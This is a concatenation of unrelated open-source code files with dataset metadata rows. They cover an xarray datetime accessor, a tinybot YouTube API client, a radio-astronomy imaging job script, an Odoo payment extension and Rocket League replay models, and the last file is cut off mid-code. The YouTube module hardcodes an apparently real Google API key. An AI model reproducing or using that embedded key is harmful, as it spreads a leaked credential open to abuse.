-------
formatted strings : same type as values
Array-like of strings formatted for each element in values
Examples
--------
>>> rng = xr.Dataset({"time": datetime.datetime(2000, 1, 1)})
>>> rng["time"].dt.strftime("%B %d, %Y, %r")
<xarray.DataArray 'strftime' ()>
array('January 01, 2000, 12:00:00 AM', dtype=object)
"""
'''
obj_type = type(self._obj)
result = _strftime(self._obj.data, date_format)
return obj_type(
result, name="strftime", coords=self._obj.coords, dims=self._obj.dims
)
year = Properties._tslib_field_accessor(
"year", "The year of the datetime", np.int64
)
month = Properties._tslib_field_accessor(
"month", "The month as January=1, December=12", np.int64
)
day = Properties._tslib_field_accessor("day", "The days of the datetime", np.int64)
hour = Properties._tslib_field_accessor(
"hour", "The hours of the datetime", np.int64
)
minute = Properties._tslib_field_accessor(
"minute", "The minutes of the datetime", np.int64
)
second = Properties._tslib_field_accessor(
"second", "The seconds of the datetime", np.int64
)
microsecond = Properties._tslib_field_accessor(
"microsecond", "The microseconds of the datetime", np.int64
)
nanosecond = Properties._tslib_field_accessor(
"nanosecond", "The nanoseconds of the datetime", np.int64
)
weekofyear = Properties._tslib_field_accessor(
"weekofyear", "The week ordinal of the year", np.int64
)
week = weekofyear
dayofweek = Properties._tslib_field_accessor(
"dayofweek", "The day of the week with Monday=0, Sunday=6", np.int64
)
weekday = dayofweek
weekday_name = Properties._tslib_field_accessor(
"weekday_name", "The name of day in a week", object
)
dayofyear = Properties._tslib_field_accessor(
"dayofyear", "The ordinal day of the year", np.int64
)
quarter = Properties._tslib_field_accessor("quarter", "The quarter of the date")
days_in_month = Properties._tslib_field_accessor(
"days_in_month", "The number of days in the month", np.int64
)
daysinmonth = days_in_month
season = Properties._tslib_field_accessor("season", "Season of the year", object)
time = Properties._tslib_field_accessor(
"time", "Timestamps corresponding to datetimes", object
)
is_month_start = Properties._tslib_field_accessor(
"is_month_start",
"Indicates whether the date is the first day of the month.",
bool,
)
is_month_end = Properties._tslib_field_accessor(
"is_month_end", "Indicates whether the date is the last day of the month.", bool
)
is_quarter_start = Properties._tslib_field_accessor(
"is_quarter_start",
"Indicator for whether the date is the first day of a quarter.",
bool,
)
is_quarter_end = Properties._tslib_field_accessor(
"is_quarter_end",
"Indicator for whether the date is the last day of a quarter.",
bool,
)
is_year_start = Properties._tslib_field_accessor(
"is_year_start", "Indicate whether the date is the first day of a year.", bool
)
is_year_end = Properties._tslib_field_accessor(
"is_year_end", "Indicate whether the date is the last day of the year.", bool
)
is_leap_year = Properties._tslib_field_accessor(
"is_leap_year", "Boolean indicator if the date belongs to a leap year.", bool
)
class TimedeltaAccessor(Properties):
"""Access Timedelta fields for DataArrays with Timedelta-like dtypes.
Fields can be accessed through the `.dt` attribute for applicable DataArrays.
Examples
--------
>>> import pandas as pd
>>> import xarray as xr
>>> dates = pd.timedelta_range(start="1 day", freq="6H", periods=20)
>>> ts = xr.DataArray(dates, dims=("time"))
>>> ts
<xarray.DataArray (time: 20)>
array([ 86400000000000, 108000000000000, 129600000000000, 151200000000000,
172800000000000, 194400000000000, 216000000000000, 237600000000000,
259200000000000, 280800000000000, 302400000000000, 324000000000000,
345600000000000, 367200000000000, 388800000000000, 410400000000000,
432000000000000, 453600000000000, 475200000000000, 496800000000000],
dtype='timedelta64[ns]')
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt
<xarray.core.accessor_dt.TimedeltaAccessor object at 0x109a27d68>
>>> ts.dt.days
<xarray.DataArray 'days' (time: 20)>
array([1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt.microseconds
<xarray.DataArray 'microseconds' (time: 20)>
array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt.seconds
<xarray.DataArray 'seconds' (time: 20)>
array([ 0, 21600, 43200, 64800, 0, 21600, 43200, 64800, 0,
21600, 43200, 64800, 0, 21600, 43200, 64800, 0, 21600,
43200, 64800])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
"""
days = Properties._tslib_field_accessor(
"days", "Number of days for each element.", np.int64
)
seconds = Properties._tslib_field_accessor(
"seconds",
"Number of seconds (>= 0 and less than 1 day) for each element.",
np.int64,
)
microseconds = Properties._tslib_field_accessor(
"microseconds",
"Number of microseconds (>= 0 and less than 1 second) for each element.",
np.int64,
)
nanoseconds = Properties._tslib_field_accessor(
"nanoseconds",
"Number of nanoseconds (>= 0 and less than 1 microsecond) for each element.",
np.int64,
)
class CombinedDatetimelikeAccessor(DatetimeAccessor, TimedeltaAccessor):
def __new__(cls, obj):
# CombinedDatetimelikeAccessor isn't really instatiated. Instead
# we need to choose which parent (datetime or timedelta) is
# appropriate. Since we're checking the dtypes anyway, we'll just
# do all the validation here.
if not _contains_datetime_like_objects(obj):
raise TypeError(
"'.dt' accessor only available for "
"DataArray with datetime64 timedelta64 dtype or "
"for arrays containing cftime datetime "
"objects."
)
if is_np_timedelta_like(obj.dtype):
return TimedeltaAccessor(obj)
else:
return DatetimeAccessor(obj)
| apache-2.0 | 4,147,006,790,076,963,300 | 33.560086 | 90 | 0.626824 | false |
nortxort/tinybot-rtc | apis/youtube.py | 1 | 8787 | # -*- coding: utf-8 -*-
""" Contains functions to fetch info from youtube's API (googleapis.com/youtube/v3/) """
import logging
import util.web
import _track
from util import string_util
API_KEY = 'AIzaSyCPQe4gGZuyVQ78zdqf9O5iEyfVLPaRwZg'
ALLOWED_COUNTRIES = ['DK', 'PL', 'UK']
REFERER = 'https://tinychat.com'
SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search?' \
'type=video&key={0}&maxResults=50&q={1}&part=snippet'
PLAYLIST_SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search?' \
'type=playlist&key={0}&maxResults=50&q={1}&part=snippet'
PLAYLIST_ITEMS_URL = 'https://www.googleapis.com/youtube/v3/playlistItems?' \
'key={0}&playlistId={1}&maxResults=50&part=snippet,id'
VIDEO_DETAILS_URL = 'https://www.googleapis.com/youtube/v3/videos?' \
'id={1}&key={0}&part=contentDetails,snippet'
log = logging.getLogger(__name__)
def search(search_term):
"""
Searches the youtube API for a youtube video matching the search term.
A json response of ~50 possible items matching the search term will be presented.
Each video_id will then be checked by video_details() until a candidate has been found
and the resulting Track can be returned.
:param search_term: The search term str to search for.
:type search_term: str
:return: A Track object or None on error.
:rtype: Track | None
"""
url = SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
track = None
if 'items' in response['json']:
try:
for item in response['json']['items']:
video_id = item['id']['videoId']
details = video_details(video_id)
if details is not None:
track = details
break
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track
def search_list(search_term, results=10):
"""
Searches the API of youtube for videos matching the search term.
Instead of returning only one video matching the search term, we return a list of candidates.
:param search_term: The search term to search for.
:type search_term: str
:param results: Amount of items in the list.
:type results: int
:return: A list of Track objects or None on error.
:rtype: list | None
"""
url = SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
track_list = []
if 'items' in response['json']:
try:
for i, item in enumerate(response['json']['items']):
if i == results:
return track_list
else:
video_id = item['id']['videoId']
track = video_details(video_id)
if track is not None:
track_list.append(track)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track_list
def playlist_search(search_term, results=5):
"""
Searches youtube for a playlist matching the search term.
:param search_term: The search term to search to search for.
:type search_term: str
:param results: the number of playlist matches we want returned.
:type results: int
    :return: A list of dictionaries with the keys: `playlist_title`, `playlist_id`
:rtype: list | None
"""
url = PLAYLIST_SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
play_lists = []
if 'items' in response['json']:
try:
for i, item in enumerate(response['json']['items']):
if i == results:
return play_lists
playlist_id = item['id']['playlistId']
                    playlist_title = item['snippet']['title']
play_list_info = {
'playlist_title': playlist_title,
'playlist_id': playlist_id
}
play_lists.append(play_list_info)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return play_lists
def playlist_videos(playlist_id):
"""
Find the videos for a given playlist ID.
The list returned will contain a maximum of 50 videos.
:param playlist_id: The playlist ID
:type playlist_id: str
:return: A list ofTrack objects.
:rtype: list | None
"""
url = PLAYLIST_ITEMS_URL.format(API_KEY, playlist_id)
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
video_list = []
# next_page_token = response['json']['nextPageToken']
if 'items' in response['json']:
try:
for item in response['json']['items']:
video_id = item['snippet']['resourceId']['videoId']
track = video_details(video_id)
if track is not None:
video_list.append(track)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return video_list
def video_details(video_id, check=True):
"""
Youtube helper function to get the video time for a given video id.
Checks a youtube video id to see if the video is blocked or allowed
in the ALLOWED_COUNTRIES list. If a video is blocked in one of the countries,
None is returned. If a video is NOT allowed in ONE of the countries,
None is returned else a Track object will be returned.
:param video_id: The youtube video id to check.
:type video_id: str
:param check: check for region restriction. Default: True
:type check: bool
:return: A Track object.
:rtype: Track | None
"""
url = VIDEO_DETAILS_URL.format(API_KEY, video_id)
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
if 'items' in response['json']:
track = None
if len(response['json']['items']) != 0:
try:
content_details = response['json']['items'][0]['contentDetails']
if check:
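                        # Drop the video if any country in ALLOWED_COUNTRIES is explicitly blocked,
                        # or if the video's allowed list leaves one of those countries out.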
if 'regionRestriction' in content_details:
if 'blocked' in content_details['regionRestriction']:
blocked = content_details['regionRestriction']['blocked']
if [i for e in ALLOWED_COUNTRIES for i in blocked if e in i]:
log.info('%s is blocked in: %s' % (video_id, blocked))
return None
if 'allowed' in content_details['regionRestriction']:
allowed = content_details['regionRestriction']['allowed']
if [i for e in ALLOWED_COUNTRIES for i in allowed if e not in i]:
log.info('%s is allowed in: %s' % (video_id, allowed))
return None
video_time = string_util.convert_to_seconds(content_details['duration'])
video_title = response['json']['items'][0]['snippet']['title']
image_medium = response['json']['items'][0]['snippet']['thumbnails']['medium']['url']
track = _track.Track(video_id=video_id, video_time=video_time, video_title=video_title,
image=image_medium)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track
| mit | -1,263,738,826,153,310,200 | 34.273092 | 107 | 0.542525 | false |
e-koch/VLA_Lband | 14B-088/HI/imaging/imaging_tests/sd_combo_tests/sd_combo_imaging.py | 1 | 2852 |
'''
Compare feathering with different SD data.
'''
import os
from shutil import copytree
from copy import copy
import subprocess
# Job parameters
NODE = "1"
PROCS = "12"
PMEM = "4000mb"
HOURS = "72"
# Run imaging tests w/ different parameters/CASA versions
output_path = os.path.expanduser("~/m33/14B-088/testing")
os.chdir(output_path)
filename = os.path.expanduser("~/code_repos/VLA_Lband/14B-088/HI/imaging/"
"imaging_tests/sd_combo_tests/"
"HI_single_channel_tclean.py")
ms_name = "14B-088_HI_LSRK.ms.contsub_channel_1000.ms"
maskname = "M33_14B-088_HI_mask_modified_channel_330.image"
modelnames = {"Arecibo": "M33_14B-088_HI_model_channel_330.image",
"Effelsburg": "",
"GBT": "",
"None": "None"}
casa_call = os.path.expanduser("~/casa-release-4.7.0-el6/bin/casa")
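# qsub call template; the UPPERCASE placeholders are substituted below and per job inside the loop.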
call = 'qsub -N JOB_NAME -l nodes=NODE:ppn=PROCS,pmem=PMEM,' \
       'walltime=HOURS:00:00 -d . <<< "VERSION --logfile JOB_NAME.log -c ' \
'FILENAME MS_NAME MODEL USE_MODEL MASK OUT_ROOT"'
# Set job parameters. Name is done in the loop.
call = call.replace("NODE", NODE)
call = call.replace("PROCS", PROCS)
call = call.replace("PMEM", PMEM)
call = call.replace("HOURS", HOURS)
call = call.replace("FILENAME", filename)
call = call.replace("MS_NAME", ms_name)
# Now loop through all combinations
for tele in modelnames:
for use_cleanmodel in [True, False]:
# Don't run the no-SD case twice.
if tele == "None" and not use_cleanmodel:
continue
JOB_NAME = "{0}.Model_{1}.AsCleanModel_{2}"\
.format(ms_name[:-3],
tele,
use_cleanmodel)
new_call = copy(call)
new_call = new_call.replace("JOB_NAME", JOB_NAME)
new_call = new_call.replace("MODEL", modelnames[tele])
new_call = new_call.replace("USE_MODEL", use_cleanmodel)
new_call = new_call.replace("MASK", maskname)
new_call = new_call.replace("OUT_ROOT", JOB_NAME)
job_folder = os.path.join(output_path, JOB_NAME)
# Assume that the data are already copied if the folder
# exists.
if not os.path.exists(job_folder):
os.mkdir(job_folder)
# Copy the ms, and the model and mask, if needed.
copytree(ms_name, os.path.join(job_folder,
ms_name))
            model = modelnames[tele]
            if model and model != "None":
                copytree(model, os.path.join(job_folder,
                                             model))
            if maskname:
                copytree(maskname, os.path.join(job_folder, maskname))
os.chdir(job_folder)
sp = subprocess.Popen(["/bin/bash", "-i", "-c",
new_call])
sp.communicate()
os.chdir(output_path)
| mit | -7,503,296,971,442,701,000 | 30.340659 | 74 | 0.576438 | false |
south-coast-science/scs_mfr | src/scs_mfr/host_id.py | 1 | 1107 | #!/usr/bin/env python3
"""
Created on 16 Apr 2017
@author: Bruno Beloff ([email protected])
DESCRIPTION
The host_id utility reports the serial number of the host system processor board. The meaning of "serial number" is
implemented differently on each platform:
* Raspberry Pi: /proc/cpuinfo
* BeagleBone: hexdump -e '8/1 \"%c\"' /sys/bus/i2c/devices/0-0050/eeprom -s 16 -n 12
The host_id utility should be made available to the scs_dev/control_receiver in order that the host serial number
can be verified by a remote management system.
SYNOPSIS
host_id.py
EXAMPLES
./host_id.py
DOCUMENT EXAMPLE
"0000000040d4d158"
BUGS
On Raspberry Pi, the host ID appears to be derived from the MAC address of the active interface, and is therefore
unreliable on multi-homed hosts.
"""
from scs_core.data.json import JSONify
from scs_host.sys.host import Host
# --------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
serial_number = Host.serial_number()
print(JSONify.dumps(serial_number))
| mit | 4,752,368,238,099,504,000 | 24.159091 | 118 | 0.669377 | false |
shendo/netsink | tests/test_sslwrap.py | 1 | 1274 | # Netsink - Network Sinkhole for Isolated Malware Analysis
# Copyright (C) 2013-2014 Steve Henderson
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import SocketServer
import ssl
import thread
from netsink.config import ModuleConfig
from netsink.modules import sslwrap
def test_sslhandler():
server = SocketServer.TCPServer(('', 0), sslwrap.SSLHandler)
server.cfg = ModuleConfig('ssl.conf').cfg
thread.start_new_thread(server.serve_forever, ())
client = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
client.connect(('127.0.0.1', server.socket.getsockname()[1]))
assert client.ssl_version >= 2
| gpl-3.0 | 6,994,835,708,226,046,000 | 36.5 | 79 | 0.737049 | false |
ingadhoc/account-financial-tools | account_ux/models/account_payment.py | 1 | 1171 | # © 2016 ADHOC SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields
import datetime
class AccountPayment(models.Model):
_inherit = "account.payment"
def _get_liquidity_move_line_vals(self, amount):
vals = super()._get_liquidity_move_line_vals(amount)
days_for_collection = False
journal = self.journal_id
if (self.payment_method_code == 'inbound_debit_card'):
days_for_collection = journal.debit_card_days_for_collection
elif (self.payment_method_code == 'inbound_credit_card'):
days_for_collection = journal.credit_card_days_for_collection
if days_for_collection:
            vals['date_maturity'] = fields.Date.to_string(
                fields.Date.from_string(self.payment_date) +
                datetime.timedelta(days=days_for_collection))
return vals
def action_draft(self):
"""
        On payment back to draft, delete move_name as we want to allow deletion
        of payments. TODO: this could be parametrizable
"""
res = super().action_draft()
self.write({'move_name': False})
return res
| agpl-3.0 | 9,087,780,728,242,621,000 | 35.5625 | 81 | 0.625641 | false |
rocket-league-replays/rocket-league-replays | rocket_league/apps/replays/models.py | 1 | 27055 | import logging
import math
import re
from itertools import zip_longest
import bitstring
from django.conf import settings
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pyrope import Replay as Pyrope
from social.apps.django_app.default.fields import JSONField
from .parser import parse_replay_header, parse_replay_netstream
logger = logging.getLogger('rocket_league')
PRIVACY_PRIVATE = 1
PRIVACY_UNLISTED = 2
PRIVACY_PUBLIC = 3
PLATFORM_UNKNOWN = 0
PLATFORM_STEAM = 1
PLATFORM_PSN = 2
PLATFORM_XBOX = 4
PLATFORM_SWITCH = 6
PLATFORMS = {
'Unknown': PLATFORM_UNKNOWN,
'Steam': PLATFORM_STEAM,
'PlayStation': PLATFORM_PSN,
'Xbox': PLATFORM_XBOX,
'Switch': PLATFORM_SWITCH,
}
PLATFORMS_MAPPINGS = {
'unknown': PLATFORM_UNKNOWN,
'steam': PLATFORM_STEAM,
'Steam': PLATFORM_STEAM,
'PlayStation': PLATFORM_PSN,
'playstation': PLATFORM_PSN,
'ps4': PLATFORM_PSN,
'Xbox': PLATFORM_XBOX,
'xbox': PLATFORM_XBOX,
'xboxone': PLATFORM_XBOX,
'switch': PLATFORM_SWITCH,
'Switch': PLATFORM_SWITCH,
'OnlinePlatform_PS4': PLATFORM_PSN,
'OnlinePlatform_Unknown': PLATFORM_UNKNOWN,
'OnlinePlatform_Dingo': PLATFORM_XBOX,
'OnlinePlatform_Steam': PLATFORM_STEAM,
'OnlinePlatform_NNX': PLATFORM_SWITCH,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Steam']}": PLATFORM_STEAM,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Dingo']}": PLATFORM_XBOX,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_PS4']}": PLATFORM_PSN,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Unknown']}": PLATFORM_UNKNOWN,
# The next values are used for the official API.
PLATFORM_UNKNOWN: 'unknown',
str(PLATFORM_UNKNOWN): 'unknown',
PLATFORM_STEAM: 'steam',
str(PLATFORM_STEAM): 'steam',
PLATFORM_PSN: 'ps4',
str(PLATFORM_PSN): 'ps4',
PLATFORM_XBOX: 'xboxone',
str(PLATFORM_XBOX): 'xboxone',
PLATFORM_SWITCH: 'switch',
str(PLATFORM_SWITCH): 'switch',
None: PLATFORM_UNKNOWN,
}
class Season(models.Model):
title = models.CharField(
max_length=100,
unique=True,
)
start_date = models.DateTimeField()
def __str__(self):
return self.title
class Meta:
ordering = ['-start_date']
def get_default_season():
if Season.objects.count() == 0:
season = Season.objects.create(
title='Season 1',
start_date='2015-07-07' # Game release date
)
return season.pk
return Season.objects.filter(
start_date__lte=now(),
)[0].pk
class Map(models.Model):
title = models.CharField(
max_length=100,
blank=True,
null=True,
)
slug = models.CharField(
max_length=100,
)
image = models.FileField(
upload_to='uploads/files',
blank=True,
null=True,
)
def __str__(self):
return self.title or self.slug
class Meta:
ordering = ['title']
class Replay(models.Model):
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
blank=True,
null=True,
db_index=True,
)
season = models.ForeignKey(
Season,
default=get_default_season,
)
title = models.CharField(
"replay name",
max_length=128,
blank=True,
null=True,
)
playlist = models.PositiveIntegerField(
choices=[(v, k) for k, v in settings.PLAYLISTS.items()],
default=0,
blank=True,
null=True,
)
file = models.FileField(
upload_to='uploads/replay_files',
)
heatmap_json_file = models.FileField(
upload_to='uploads/replay_json_files',
blank=True,
null=True,
)
location_json_file = models.FileField(
upload_to='uploads/replay_location_json_files',
blank=True,
null=True,
)
replay_id = models.CharField(
"replay ID",
max_length=100,
blank=True,
null=True,
db_index=True,
)
player_name = models.CharField(
max_length=100,
blank=True,
null=True,
)
player_team = models.IntegerField(
default=0,
blank=True,
null=True,
)
map = models.ForeignKey(
Map,
blank=True,
null=True,
db_index=True,
)
server_name = models.CharField(
max_length=100,
blank=True,
null=True,
)
timestamp = models.DateTimeField(
blank=True,
null=True,
)
date_created = models.DateTimeField(
default=now,
)
team_sizes = models.PositiveIntegerField(
blank=True,
null=True,
db_index=True,
)
team_0_score = models.IntegerField(
default=0,
blank=True,
null=True,
db_index=True,
)
team_1_score = models.IntegerField(
default=0,
blank=True,
null=True,
db_index=True,
)
match_type = models.CharField(
max_length=16,
blank=True,
null=True,
)
privacy = models.PositiveIntegerField(
'replay privacy',
choices=[
(PRIVACY_PRIVATE, 'Private'),
(PRIVACY_UNLISTED, 'Unlisted'),
(PRIVACY_PUBLIC, 'Public')
],
default=3,
)
# Parser V2 values.
keyframe_delay = models.FloatField(
blank=True,
null=True,
)
max_channels = models.IntegerField(
default=1023,
blank=True,
null=True,
)
max_replay_size_mb = models.IntegerField(
"max replay size (MB)",
default=10,
blank=True,
null=True,
)
num_frames = models.IntegerField(
blank=True,
null=True,
)
record_fps = models.FloatField(
"record FPS",
default=30.0,
blank=True,
null=True,
)
shot_data = JSONField(
blank=True,
null=True,
)
excitement_factor = models.FloatField(
default=0.00,
)
show_leaderboard = models.BooleanField(
default=False,
)
average_rating = models.PositiveIntegerField(
blank=True,
null=True,
default=0,
)
crashed_heatmap_parser = models.BooleanField(
default=False,
)
processed = models.BooleanField(
default=False,
)
@cached_property
def uuid(self):
return re.sub(r'([A-F0-9]{8})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{12})', r'\1-\2-\3-\4-\5', self.replay_id).lower()
def team_x_player_list(self, team):
return [
"{}{}".format(
player.player_name,
" ({})".format(player.goal_set.count()) if player.goal_set.count() > 0 else '',
) for player in self.player_set.filter(
team=team,
)
]
def team_x_players(self, team):
return ', '.join(self.team_x_player_list(team))
def team_0_players(self):
return self.team_x_players(0)
def team_1_players(self):
return self.team_x_players(1)
def team_0_player_list(self):
return self.team_x_player_list(0)
def team_1_player_list(self):
return self.team_x_player_list(1)
def player_pairs(self):
return zip_longest(self.team_0_player_list(), self.team_1_player_list())
@cached_property
def region(self):
if not self.server_name:
return 'N/A'
match = re.search(settings.SERVER_REGEX, self.server_name)
if match:
return match.groups()[1]
return 'N/A'
def lag_report_url(self):
base_url = 'https://psyonixhr.wufoo.com/forms/game-server-performance-report'
if not self.server_name:
return base_url
# Split out the server name.
match = re.search(r'(EU|USE|USW|OCE|SAM)(\d+)(-([A-Z][a-z]+))?', self.server_name).groups()
return "{}/def/field1={}&field2={}&field13={}".format(
base_url,
*match
)
@cached_property
def match_length(self):
if not self.num_frames or not self.record_fps:
return 'N/A'
calculation = self.num_frames / self.record_fps
minutes, seconds = divmod(calculation, 60)
return '%d:%02d' % (
int(minutes),
int(seconds),
)
def calculate_excitement_factor(self):
# Multiplers for use in factor tweaking.
swing_rating_multiplier = 8
goal_count_multiplier = 1.2
# Calculate how the swing changed throughout the game.
swing = 0
swing_values = []
for goal in self.goal_set.all():
if goal.player.team == 0:
swing -= 1
else:
swing += 1
swing_values.append(swing)
if self.team_0_score > self.team_1_score:
# Team 0 won, but were they ever losing?
deficit_values = [x for x in swing_values if x < 0]
if deficit_values:
deficit = max(swing_values)
else:
deficit = 0
score_min_def = self.team_0_score - deficit
else:
# Team 1 won, but were they ever losing?
deficit_values = [x for x in swing_values if x < 0]
if deficit_values:
deficit = abs(min(deficit_values))
else:
deficit = 0
score_min_def = self.team_1_score - deficit
if score_min_def != 0:
swing_rating = float(deficit) / score_min_def * swing_rating_multiplier
else:
swing_rating = 0
# Now we have the swing rating, adjust it by the total number of goals.
# This gives us a "base value" for each replay and allows replays with
        # lots of goals but not much swing to get a reasonable rating. Cap the goal
# multiplier at 5.
total_goals = self.team_0_score + self.team_1_score
if total_goals > 5:
total_goals = 5
swing_rating += total_goals * goal_count_multiplier
return swing_rating
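
    # Rough worked example (illustrative numbers only): a swing_rating of 4.0
    # before the goal adjustment, with 7 total goals, gets the goal count
    # capped at 5, giving 4.0 + 5 * 1.2 = 10.0.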
def calculate_average_rating(self):
from ..users.models import LeagueRating
players = self.player_set.exclude(
online_id__isnull=True,
)
num_player_ratings = 0
total_player_ratings = 0
for player in players:
try:
# Get the latest rating for this player.
rating = LeagueRating.objects.get(
platform=player.platform,
online_id=player.online_id,
playlist=self.playlist,
)
total_player_ratings += rating.tier
num_player_ratings += 1
except LeagueRating.DoesNotExist:
# Should we get the ratings?
continue
if num_player_ratings > 0:
return math.ceil(total_player_ratings / num_player_ratings)
return 0
def eligible_for_feature(self, feature):
features = {
'playback': settings.PATREON_PLAYBACK_PRICE,
'boost_analysis': settings.PATREON_BOOST_PRICE,
}
patreon_amount = features[feature]
# Import here to avoid circular imports.
from ..site.templatetags.site import patreon_pledge_amount
# Is the uploader a patron?
if self.user:
pledge_amount = patreon_pledge_amount({}, user=self.user)
if pledge_amount >= patreon_amount:
return True
# Are any of the players patron?
players = self.player_set.filter(
platform__in=['OnlinePlatform_Steam', '1'],
)
for player in players:
pledge_amount = patreon_pledge_amount({}, steam_id=player.online_id)
if pledge_amount >= patreon_amount:
return True
return False
@property
def queue_priority(self):
# Returns one of 'tournament', 'priority', 'general', where 'tournament'
# is the highest priority.
# TODO: Add tournament logic.
if self.eligible_for_playback:
return 'priority'
return 'general'
# Feature eligibility checks.
@cached_property
def eligible_for_playback(self):
return self.eligible_for_feature('playback')
@cached_property
def show_playback(self):
# First of all, is there even a JSON file?
if not self.location_json_file:
return False
return self.eligible_for_feature('playback')
@cached_property
def eligible_for_boost_analysis(self):
return self.eligible_for_feature('boost_analysis')
@cached_property
def show_boost_analysis(self):
# Have we got any boost data yet?
if self.boostdata_set.count() == 0:
return False
return self.eligible_for_feature('boost_analysis')
# Other stuff
@cached_property
def get_human_playlist(self):
if not self.playlist:
return 'Unknown'
display = self.get_playlist_display()
if display == self.playlist:
display = 'Unknown'
return settings.HUMAN_PLAYLISTS.get(self.playlist, display)
def get_absolute_url(self):
if self.replay_id:
return reverse('replay:detail', kwargs={
'replay_id': re.sub(r'([A-F0-9]{8})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{12})', r'\1-\2-\3-\4-\5', self.replay_id).lower(),
})
return reverse('replay:detail', kwargs={
'pk': self.pk,
})
class Meta:
ordering = ['-timestamp', '-pk']
def __str__(self):
return self.title or str(self.pk) or '[{}] {} {} game on {}. Final score: {}, Uploaded by {}.'.format(
self.timestamp,
'{size}v{size}'.format(size=self.team_sizes),
self.match_type,
self.map,
'{}-{}'.format(self.team_0_score, self.team_1_score),
self.player_name,
)
def clean(self):
if self.pk:
return
if self.file:
# Ensure we're at the start of the file as `clean()` can sometimes
# be called multiple times (for some reason..)
self.file.seek(0)
file_url = self.file.url # To help the exception handler
try:
replay = Pyrope(self.file.read())
except bitstring.ReadError:
raise ValidationError("The file you selected does not seem to be a valid replay file.")
# Check if this replay has already been uploaded.
replays = Replay.objects.filter(
replay_id=replay.header['Id'],
)
if replays.count() > 0:
raise ValidationError(mark_safe("This replay has already been uploaded, <a target='_blank' href='{}'>you can view it here</a>.".format(
replays[0].get_absolute_url()
)))
self.replay_id = replay.header['Id']
def save(self, *args, **kwargs):
parse_netstream = False
if 'parse_netstream' in kwargs:
parse_netstream = kwargs.pop('parse_netstream')
super(Replay, self).save(*args, **kwargs)
if self.file and not self.processed:
try:
if parse_netstream:
# Header parse?
parse_replay_netstream(self.pk)
else:
parse_replay_header(self.pk)
            except Exception:
logger.exception('Replay save failed')
class Player(models.Model):
replay = models.ForeignKey(
Replay,
)
player_name = models.CharField(
max_length=100,
db_index=True,
)
team = models.IntegerField()
# 1.06 data
score = models.PositiveIntegerField(
default=0,
blank=True,
)
goals = models.PositiveIntegerField(
default=0,
blank=True,
)
shots = models.PositiveIntegerField(
default=0,
blank=True,
)
assists = models.PositiveIntegerField(
default=0,
blank=True,
)
saves = models.PositiveIntegerField(
default=0,
blank=True,
)
platform = models.CharField(
max_length=100,
blank=True,
null=True,
db_index=True,
)
online_id = models.CharField(
max_length=128,
blank=True,
null=True,
db_index=True,
)
bot = models.BooleanField(
default=False,
)
spectator = models.BooleanField(
default=False,
)
heatmap = models.FileField(
upload_to='uploads/heatmap_files',
blank=True,
null=True,
)
user_entered = models.BooleanField(
default=False,
)
# Taken from the netstream.
actor_id = models.PositiveIntegerField(
default=0,
blank=True,
null=True,
)
unique_id = models.CharField(
max_length=128,
blank=True,
null=True,
)
party_leader = models.ForeignKey(
'self',
blank=True,
null=True,
)
camera_settings = JSONField(
blank=True,
null=True,
)
vehicle_loadout = JSONField(
blank=True,
null=True,
)
total_xp = models.IntegerField(
default=0,
blank=True,
null=True,
)
# Other stuff.
boost_data = JSONField(
blank=True,
null=True,
)
@cached_property
def get_rating_data(self):
from ..users.models import LeagueRating
from ..users.templatetags.ratings import tier_name
if self.replay.playlist not in settings.RANKED_PLAYLISTS:
return
try:
rating = LeagueRating.objects.get_or_request(
platform=self.platform,
